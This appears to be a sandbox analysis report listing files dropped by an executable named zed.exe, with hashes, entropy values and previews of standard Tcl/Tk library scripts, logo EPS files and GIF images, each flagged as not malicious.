                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17565
                                                                                                                                                                                                                                            Entropy (8bit):4.959816621842895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:FNP8nO9Wo8k5NfQH8EsOy8WMdbffNCvHshPOw7jW:FNf8uNfQH89Z8WMdz1vDW
                                                                                                                                                                                                                                            MD5:FDB839B85C4CEB34DEC04E0EBD6A3C96
                                                                                                                                                                                                                                            SHA1:0FD8981093CC6ED9927D1DDE708FECE84B9C5E6F
                                                                                                                                                                                                                                            SHA-256:07812124D27E47621AF74FDB90C777D3219B02F657FC2F97F606C69EF9468A01
                                                                                                                                                                                                                                            SHA-512:E65616B3F6BDC3910FC90E9710426370AA4B0A0D9EB6289871B9C30A98A2F2B5CC1E471B63203210AAE89120F20F164A33E01DA45BCCCCCEC7BFC1CCFD70FAC7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# iconlist.tcl..#..#.Implements the icon-list megawidget used in the "Tk" standard file..#.selection dialog boxes...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...# Copyright (c) 2009 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# API Summary:..#.tk::IconList <path> ?<option> <value>? .....#.<path> add <imageName> <itemList>..#.<path> cget <option>..#.<path> configure ?<option>? ?<value>? .....#.<path> deleteall..#.<path> destroy..#.<path> get <itemIndex>..#.<path> index <index>..#.<path> invoke..#.<path> see <index>..#.<path> selection anchor ?<int>?..#.<path> selection clear <first> ?<last>?..#.<path> selection get..#.<path> selection includes <item>..#.<path> selection set <first> ?<last>?.....package require Tk....::tk::Megawidget create ::tk::IconList ::tk::FocusableWidget {.. variable w canvas sbar accel accelCB fill font index \...itemList itemsPerColumn list
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11037
                                                                                                                                                                                                                                            Entropy (8bit):6.048349526382653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0nEPytJLl1S47T3YqN5/vkJpnhXqBB4aw2rqZiygTtYTpOq/pc75Mk:xqLz7F5KTqBBLuZ1gTSsqhk
                                                                                                                                                                                                                                            MD5:995A0A8F7D0861C268AEAD5FC95A42EA
                                                                                                                                                                                                                                            SHA1:21E121CF85E1C4984454237A646E58EC3C725A72
                                                                                                                                                                                                                                            SHA-256:1264940E62B9A37967925418E9D0DC0BEFD369E8C181B9BAB3D1607E3CC14B85
                                                                                                                                                                                                                                            SHA-512:DB7F5E0BC7D5C5F750E396E645F50A3E0CDE61C9E687ADD0A40D0C1AA304DDFBCEEB9F33AD201560C6E2B051F2EDED07B41C43D00F14EE435CDEEE73B56B93C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# icons.tcl --..#..#.A set of stock icons for use in Tk dialogs. The icons used here..#.were provided by the Tango Desktop project which provides a..#.unified set of high quality icons licensed under the..#.Creative Commons Attribution Share-Alike license..#.(https://creativecommons.org/licenses/by-sa/3.0/)..#..#.See http://tango.freedesktop.org/Tango_Desktop_Project..#..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::icons {}....image create photo ::tk::icons::warning -data {.. iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABSZJREFU.. WIXll1toVEcYgL+Zc87u2Yu7MYmrWRuTJuvdiMuqiJd4yYKXgMQKVkSjFR80kFIVJfWCWlvpg4h9.. 8sXGWGof8iKNICYSo6JgkCBEJRG8ImYThNrNxmaTeM7pQ5IlJkabi0/9YZhhZv7///4z/8zPgf+7.. KCNRLgdlJijXwRyuDTlcxV9hbzv8nQmxMjg+XDtiOEplkG9PSfkztGmTgmFQd+FCVzwa3fYN/PHZ.. AcpBaReicW5xcbb64IEQqko8Lc26d/58cxS+/BY6hmJvyEfQBoUpwWCmW1FErKaGWHU13uRk4QkE.. UtxQNFR7QwIoB4eiKD9PWbVKbb10CZmaCqmpxCormRYO26QQx85B0mcD+AeK0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):329
                                                                                                                                                                                                                                            Entropy (8bit):4.3973643486226655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:nVxpJFBmHdeA1xNZgk0dIf3Ju4dFi6/XWrWhr3W7FxmVFraazmVAJFKyVQR7icr8:nj5Bqf1fZgp6A4FDG6dm7FUGAJVVMRmn
                                                                                                                                                                                                                                            MD5:921245A21F7E783997DC7B859AF1B65B
                                                                                                                                                                                                                                            SHA1:2EFE3C8F70CF18621006890BF21CC097770D140D
                                                                                                                                                                                                                                            SHA-256:C6DB098EBD8A622164D37D4AB0A8C205DB1A83AC3065D5CDE3CB5FB61925D283
                                                                                                                                                                                                                                            SHA-512:CAD823FF3D13A64C00825961E75B5133690556FB1F622834F8B1DF316A9E75BABB63B9F5148DAE7B1391123B4C8D55B4B8B2EB6F8E6E1DA9DE02A5BD7AC0FD6F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:README - images directory....This directory includes images for the Tcl Logo and the Tcl Powered..Logo. Please feel free to use the Tcl Powered Logo on any of your..products that employ the use of Tcl or Tk. The Tcl logo may also be..used to promote Tcl in your product documentation, web site or other..places you so desire...
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):34991
                                                                                                                                                                                                                                            Entropy (8bit):5.248845410801251
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:0YrY6a0v4uIqYMEKjodQKOfRXMLcSqDGpfTKFVm3AsanMEDzzBHWzaw7XUbTJjoB:0YrY6aeIqYMEKjouzfRXMLcSqDGpfTKo
                                                                                                                                                                                                                                            MD5:23C4EDED40DEC065F99E6653AEE1BB31
                                                                                                                                                                                                                                            SHA1:3175E261BE198731DEDB07264CCB84C8DEDF7967
                                                                                                                                                                                                                                            SHA-256:76207D8DFDE189A29DC0E76ADB7EAAA606B96BC6C1C831F34D1C85B1C5B51DD3
                                                                                                                                                                                                                                            SHA-512:BA139A64BE72BB681040924C4294E2726BA5AB243E805E60A854D2D23E154705E2431D1AB2DE732BFA393747FD30D8A5C913895CBE1463DBF50CC23CAE5B0454
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL/TK LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:58 PM)..%%BoundingBox: 251 331 371 512..%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%DocumentCustomColors: (TCL RED)..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe Illustrator
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2341
                                                                                                                                                                                                                                            Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                                            MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                                            SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                                            SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                                            SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1670
                                                                                                                                                                                                                                            Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                                            MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                                            SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                                            SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                                            SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11000
                                                                                                                                                                                                                                            Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                                            MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                                            SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                                            SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                                            SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......*\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.*^.x.....J.L.!.'........=+eZ..i..ynF.8...].y|..m.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3889
                                                                                                                                                                                                                                            Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                                            MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                                            SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                                            SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                                            SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.*&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..*K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):29706
                                                                                                                                                                                                                                            Entropy (8bit):5.33387357427899
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:0warY6a0v4uIqYMEKjodQKOfRtMLcSqDGpf88KFVmlhEtOI/eE7U0a1:03rY6aeIqYMEKjouzfRtMLcSqDGpfbKc
                                                                                                                                                                                                                                            MD5:4AE11820D4D592D02CDE458E6F8CE518
                                                                                                                                                                                                                                            SHA1:A2E8D3D6191B336D43E48A65C3AE6485B07D93C6
                                                                                                                                                                                                                                            SHA-256:87FD9E46DBB5F2BF1529AFB411182C9FB9C58E23D830C66A233AF0C256BB8EFF
                                                                                                                                                                                                                                            SHA-512:E0AD4ED570D414BF00931B0F5BBB61FEF981ABDB22ECC42F8E9841905D38874CDFE38F22EDB17ACD0F7539B2932F9C4A865FA73A49BB1458CE05EE10A78BE357
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:%!PS-Adobe-3.0 EPSF-3.0..%%Creator: Adobe Illustrator(TM) 5.5..%%For: (Bud Northern) (Mark Anderson Design)..%%Title: (TCL PWRD LOGO.ILLUS)..%%CreationDate: (8/1/96) (4:59 PM)..%%BoundingBox: 242 302 377 513..%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323..%%DocumentProcessColors: Cyan Magenta Yellow..%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0..%%+ procset Adobe_IllustratorA_AI5 1.0 0..%AI5_FileFormat 1.2..%AI3_ColorUsage: Color..%%CMYKCustomColor: 0 0.45 1 0 (Orange)..%%+ 0 0.25 1 0 (Orange Yellow)..%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV)..%%+ 0 0.79 0.91 0 (TCL RED)..%AI3_TemplateBox: 306 396 306 396..%AI3_TileBox: 12 12 600 780..%AI3_DocumentPreview: Macintosh_ColorPic..%AI5_ArtSize: 612 792..%AI5_RulerUnits: 0..%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0..%AI5_TargetResolution: 800..%AI5_NumLayers: 1..%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40..%AI5_OpenViewLayers: 7..%%EndComments..%%BeginProlog..%%BeginResource: procset Adobe_level2_AI5 1.0 0..%%Title: (Adobe I
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1615
                                                                                                                                                                                                                                            Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                                            MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                                            SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                                            SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                                            SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8O*Z.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.|..pf!..&.......8.#.8.....*..J>. .t..h6(........#..0.A...*!..)...x..u.Z....*%..H.....*.......`......|.....1.......&.....T*...f.l...
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2489
                                                                                                                                                                                                                                            Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                                            MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                                            SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                                            SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                                            SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2981
                                                                                                                                                                                                                                            Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                                            MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                                            SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                                            SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                                            SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....*0p}..KP?c.\@KW.S(..M..B.....-q...S2...*.,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.*4..(........*..F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3491
                                                                                                                                                                                                                                            Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
                                                                                                                                                                                                                                            MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                                            SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                                            SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                                            SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R...*...J.p.A.t.*..$A*...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y1*35.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. ...*..Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'|..M9..."...,*.......
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1171
                                                                                                                                                                                                                                            Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                                            MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                                            SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                                            SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                                            SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                                            Malicious:false
